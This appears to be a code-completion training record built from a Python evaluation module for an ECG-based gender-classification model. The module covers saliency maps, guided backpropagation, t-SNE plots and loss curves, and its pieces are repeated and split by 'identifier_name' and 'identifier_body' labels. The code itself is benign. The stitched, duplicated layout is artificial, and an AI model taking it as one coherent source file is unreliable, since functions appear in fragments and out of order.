one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='Train Gender loss')
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute accuracy, precision and recall scores
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores
accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred)
recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
and what kind of labels (e.g. 'gender')
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samples, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
for i_sample in range(num_samples):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
loss_history.append(loss)
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
model (nn.Module): any model
input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show()
| relu_backward_hook_function | identifier_name |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
|
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='Train Gender loss')
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute accuracy, precision and recall scores
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores
accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred)
recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
                                   and what kind of labels (e.g. 'gender')
        color (str): Color for matplotlib text, axes labels and axes ticks
    """
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samples, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
    for i_sample in range(num_samples):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
        input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
            loss_history.append(loss.item())  # store a float, not the graph-holding tensor
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
        model (nn.Module): any model
        target_class (int): index of the class whose score is maximized
        input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show()
| def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function) | identifier_body |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
